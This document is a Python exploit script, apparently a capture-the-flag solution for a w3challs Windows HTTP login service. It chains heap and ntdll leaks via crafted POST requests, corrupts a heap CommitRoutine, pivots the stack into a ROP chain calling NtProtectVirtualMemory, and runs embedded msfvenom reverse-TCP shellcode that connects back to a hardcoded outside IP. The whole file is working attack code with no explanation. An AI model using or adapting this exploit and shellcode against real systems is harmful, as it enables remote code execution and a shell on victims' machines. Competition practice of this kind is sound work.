/
sploit.py
296 lines (234 loc) · 10.5 KB
/
sploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
#!/usr/bin/env python2
# encoding: utf-8
from pwn import *
# debug with this in C:/Windows/System32/drivers/hosts:
# 172.16.62.1 win.local.w3challs.com
context.arch = 'amd64'
if len(sys.argv) < 3:
print "Usage: %s <host> <port>"
sys.exit(1)
HOST, PORT = sys.argv[1], int(sys.argv[2])
DEBUG = "debug" in sys.argv
_KUSER_SHARED_DATA = 0x7ffe0000
#l5 = listen(1337)
#
# HEAP LEAK ]--------------------------------------------------------------------
# idea: overlap params[username].value with headers** and realloc headers**
# -> HeapFree(params[username].value) -> leak the freelist pointer
l1 = listen(12345)
r1 = remote(HOST, PORT)
# 'C' of 'C:\WINDOWS' in _KUSER_SHARED_DATA!NtSystemRoot
fake_headers = p64(_KUSER_SHARED_DATA + 0x30) * 6
payload = "POST "
payload += "/login?domain=win.local.w3challs.com&password=" + "A" * 0x100 + "&username=" + urlencode(fake_headers)
payload += " HTTP/1.1\r\n"
payload += "X: " + "Y" * 0x30 + "\r\n"
payload += "X: " + "Y" * 0x50 + "\r\n"
payload += "A" * 0x40 + ": " + "B" * 0x40 + "\r\n"
payload += "Host: " + 'X' * 128 + "\r\n" # trigger off-by-one on headers**
payload += "Z" * 0x40 + ": " + "B" * 0x40 + "\r\n" # HeapReAlloc(headers**) => HeapFree(params[username].value)
payload += "\r\n"
r1.send(payload)
heap_leak = u64(l1.readuntil("::", drop=True).ljust(8, "\x00"))
log.info("heap leak: %#x" % heap_leak)
heap_base = heap_leak - 0x3160
log.success("heap of thread 1 @ %#x" % heap_base)
# NTDLL LEAK + HeapKey LEAK ]----------------------------------------------------
# idea: overlap params** with headers** and realloc headers**
# -> HeapFree(params**) -> overwrite the params** values with POST content
if DEBUG:
time.sleep(2)
l2 = listen(12345)
r2 = remote(HOST, PORT)
fake_headers = flat(_KUSER_SHARED_DATA + 0x30) * 2
username_heap_thread_1 = heap_base + 0x2c80
log.info(" 'username' in heap 1 @ %#x" % username_heap_thread_1)
ntdll_leak_addr = heap_base + 0x2c0
log.info(" ntdll pointer @ %#x" % ntdll_leak_addr)
password_heap_thread_1 = heap_base + 0x2ca0
log.info(" 'password' in heap 1 @ %#x" % password_heap_thread_1)
CommitRoutine_mangled_addr = heap_base + 0x168
log.info(" CommitRoutine in heap 1 @ %#x" % CommitRoutine_mangled_addr)
content = "A=" + urlencode(flat(
username_heap_thread_1, ntdll_leak_addr,
password_heap_thread_1, CommitRoutine_mangled_addr,
password_heap_thread_1, CommitRoutine_mangled_addr,
)) + "&domain=win.local.w3challs.com&" + "&" * 0x100
payload = "POST "
payload += '/login?a=AAAAAAAAAAAAAAAA&password=' + 'A' * 0xa0 + '&username=BBBBBBBB&username=' + urlencode(fake_headers)
payload += " HTTP/1.1\r\n"
payload += "Host: " + 'X' * 128 + "\r\n"
payload += "username: Y\r\n"
payload += "X: Y\r\n"
payload += "Content-Length: " + str(len(content)) + "\r\n"
payload += "X: " + "Y" * 0x50 + "\r\n"
payload += "\r\n"
payload += content
r2.send(payload)
ntdll_leak = u64(l2.readuntil("::", drop=True).ljust(8, "\x00")) # ntdll!RtlpStaticDebugInfo+0x90
log.success("ntdll!RtlpStaticDebugInfo leak: %#x" % ntdll_leak)
ntdll_base = ntdll_leak - 0x163d10
log.success("NTDLL @ %#x" % ntdll_base)
RtlpHeapKey = u64(l2.read(9).rsplit("\n")[0].ljust(8, "\x00")) # CommitRoutine ^ RtlpHeapKey = 0
log.success("ntdll!RtlpHeapKey = %#x" % RtlpHeapKey)
# TARGET HEAP LEAK ]----------------------------------------------------
# idea: same as before but leak the heap associated to thread 4 from ntdll
if DEBUG:
time.sleep(2)
l3 = listen(12345)
r3 = remote(HOST, PORT)
r4 = remote(HOST, PORT) # keep it inactive for the moment
fake_headers = flat(
_KUSER_SHARED_DATA + 0x30, # key: 'C' of 'C:\WINDOWS' in _KUSER_SHARED_DATA!NtSystemRoot
_KUSER_SHARED_DATA + 0x24, # value: non-null bytes
)
# threads in ntdll memory
#
# 00007ff8`92b33b80 00000205`3f7a0000 00000205`3f6e0000
# 00007ff8`92b33b90 00000205`3fa90000 00000205`3fa40000
# 00007ff8`92b33ba0 00000205`3f9f0000 00000205`3fbe0000
# 00007ff8`92b33bb0 00000205`3fb50000 00000000`00000000
thread4_addr_in_ntdll = ntdll_base + 0x163b80 + 6 * 8
log.info(" thread 4 addr stored in ntdll @ %#x" % thread4_addr_in_ntdll)
thread4_addr_in_ntdll += 2 # point after the 0000
content = "A=" + urlencode(flat(
username_heap_thread_1, thread4_addr_in_ntdll,
password_heap_thread_1, CommitRoutine_mangled_addr,
password_heap_thread_1, CommitRoutine_mangled_addr,
)) + "&domain=win.local.w3challs.com&" + "&" * 0x100
payload = "POST "
payload += '/login?a=BBBBBBBBBBBBBBBB&password=' + 'A' * 0xa0 + '&username=BBBBBBBB&username=' + urlencode(fake_headers)
payload += " HTTP/1.1\r\n"
payload += "Host: " + 'X' * 128 + "\r\n"
payload += "username: Y\r\n"
payload += "password: Y\r\n"
payload += "Content-Length: " + str(len(content)) + "\r\n"
payload += "username: " + "Y" * 0x50 + "\r\n"
payload += "\r\n"
r3.send(payload)
r3.send(content)
target_heap = u64(l3.readuntil("::", drop=True).ljust(8, "\x00")) << 16 # inside ntdll!RtlpStaticDebugInfo
log.success("target_heap @ %#x" % target_heap)
# PWN ]----------------------------------------------------
if DEBUG:
time.sleep(2)
l4 = listen(12345)
r5 = remote(HOST, PORT)
# leave ;
# mov rbx, qword [rsp+0x18] ;
# mov rax, rcx ;
# mov rbp, qword [rsp+0x20] ;
# mov rsi, qword [rsp+0x28] ;
# mov rdi, qword [rsp+0x30] ;
# pop r15 ;
# pop r14 ;
# ret ;
pivot_gadget = ntdll_base + 0x010442e
content = "A"*0x30+"=" + urlencode(flat(
username_heap_thread_1, target_heap + 0x18,
password_heap_thread_1, target_heap + 0x168,
))
content += "&password=" + urlencode(p64(pivot_gadget ^ RtlpHeapKey))
content += "&username=" + urlencode(p64(ntdll_base + 0x0d26c4).strip('\x00')) # add rsp, 0x0000000000000CD0 ; pop rbx ; ret
content += "&domain=win.local.w3challs.com"
content += "&" * 0x100
payload = "POST "
payload += ('/login?a=AAAAAAAAAAAAAAAA&username=BBBBBBBB&username=' + urlencode(fake_headers)).ljust(0xf0, '&')
payload += " HTTP/1.1\r\n"
payload += "Host: " + 'X' * 128 + "\r\n"
payload += "username: Y\r\n"
payload += "Content-Length: " + str(len(content)) + "\r\n"
payload += "\r\n"
payload += content
r5.send(payload)
#raw_input("attach")
# PWN ]----------------------------------------------------
payload = "POST "
payload += ('/login?a=AAAAAAAAAAAAAAAA&username=BBBBBBBB&username=' + urlencode(fake_headers)).ljust(0xf0, '&')
payload += " HTTP/1.1\r\n"
payload += "Host: " + 'X' * 127 + "\r\n" # not overflowing
payload += "username: Y\r\n"
payload += "Content-Length: " + str(0x3000) + "\r\n" # large enough to trigger CommitRoutine
payload += "\r\n"
payload += "PAD" # align next on 8-bytes
# store NtProtectVirtualMemory parameters
NtProtectVirtualMemory_args = target_heap + 0xa10
payload += flat(
0, # OldAccessProtection
0x5000, # dwSize
target_heap, # BaseAddress
)
payload += p64(ntdll_base + 0x0fe405) * 0x100 # ret
rw_addr = target_heap + 0x300
# NtProtectVirtualMemory(
# IN HANDLE ProcessHandle,
# IN OUT PVOID *BaseAddress,
# IN OUT PULONG NumberOfBytesToProtect,
# IN ULONG NewAccessProtection,
# OUT PULONG OldAccessProtection );
rop = flat(
# call ntdll!NtProtectVirtualMemory
ntdll_base + 0x08fb16, # pop rdx ; pop r11 ; ret
NtProtectVirtualMemory_args + 0x10, # pointer to BaseAddress
"JUNKJUNK", # r11
ntdll_base + 0x095189, # pop rcx ; ret
0xffffffffffffffff, # ProcessHandle
ntdll_base + 0x08fb11, # pop r8 ; pop r9 ; pop r10 ; pop r11 ; ret
NtProtectVirtualMemory_args + 0x8, # pointer to dwSize
0x40, # flNewProtect => PAGE_EXECUTE_READWRITE
"JUNKJUNK", # r10
"JUNKJUNK", # r11
ntdll_base + 0xa0050, # NtProtectVirtualMemory
# Jump to shellcode
target_heap + 0x1400,
p64(NtProtectVirtualMemory_args) * 5, # provide stack param
)
payload += rop
payload += "\x90" * 0x200 # nopesled
# msfvenom -p windows/x64/shell_reverse_tcp EXITFUNC=thread LHOST=212.83.129.72 LPORT=1337 -f py -v shellcode
shellcode = ""
shellcode += "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51"
shellcode += "\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52"
shellcode += "\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72"
shellcode += "\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0"
shellcode += "\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
shellcode += "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b"
shellcode += "\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48"
shellcode += "\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44"
shellcode += "\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41"
shellcode += "\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
shellcode += "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1"
shellcode += "\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44"
shellcode += "\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44"
shellcode += "\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
shellcode += "\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
shellcode += "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41"
shellcode += "\x59\x5a\x48\x8b\x12\xe9\x57\xff\xff\xff\x5d\x49"
shellcode += "\xbe\x77\x73\x32\x5f\x33\x32\x00\x00\x41\x56\x49"
shellcode += "\x89\xe6\x48\x81\xec\xa0\x01\x00\x00\x49\x89\xe5"
shellcode += "\x49\xbc\x02\x00\x05\x39\xd4\x53\x81\x48\x41\x54"
shellcode += "\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07"
shellcode += "\xff\xd5\x4c\x89\xea\x68\x01\x01\x00\x00\x59\x41"
shellcode += "\xba\x29\x80\x6b\x00\xff\xd5\x50\x50\x4d\x31\xc9"
shellcode += "\x4d\x31\xc0\x48\xff\xc0\x48\x89\xc2\x48\xff\xc0"
shellcode += "\x48\x89\xc1\x41\xba\xea\x0f\xdf\xe0\xff\xd5\x48"
shellcode += "\x89\xc7\x6a\x10\x41\x58\x4c\x89\xe2\x48\x89\xf9"
shellcode += "\x41\xba\x99\xa5\x74\x61\xff\xd5\x48\x81\xc4\x40"
shellcode += "\x02\x00\x00\x49\xb8\x63\x6d\x64\x00\x00\x00\x00"
shellcode += "\x00\x41\x50\x41\x50\x48\x89\xe2\x57\x57\x57\x4d"
shellcode += "\x31\xc0\x6a\x0d\x59\x41\x50\xe2\xfc\x66\xc7\x44"
shellcode += "\x24\x54\x01\x01\x48\x8d\x44\x24\x18\xc6\x00\x68"
shellcode += "\x48\x89\xe6\x56\x50\x41\x50\x41\x50\x41\x50\x49"
shellcode += "\xff\xc0\x41\x50\x49\xff\xc8\x4d\x89\xc1\x4c\x89"
shellcode += "\xc1\x41\xba\x79\xcc\x3f\x86\xff\xd5\x48\x31\xd2"
shellcode += "\x48\xff\xca\x8b\x0e\x41\xba\x08\x87\x1d\x60\xff"
shellcode += "\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd\x9d"
shellcode += "\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb"
shellcode += "\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41"
shellcode += "\x89\xda\xff\xd5"
payload += asm("add rsp, 0x2000")
payload += shellcode
payload += "\xcc"
r4.send(payload)
log.success('Spawning shell...')
r5.interactive()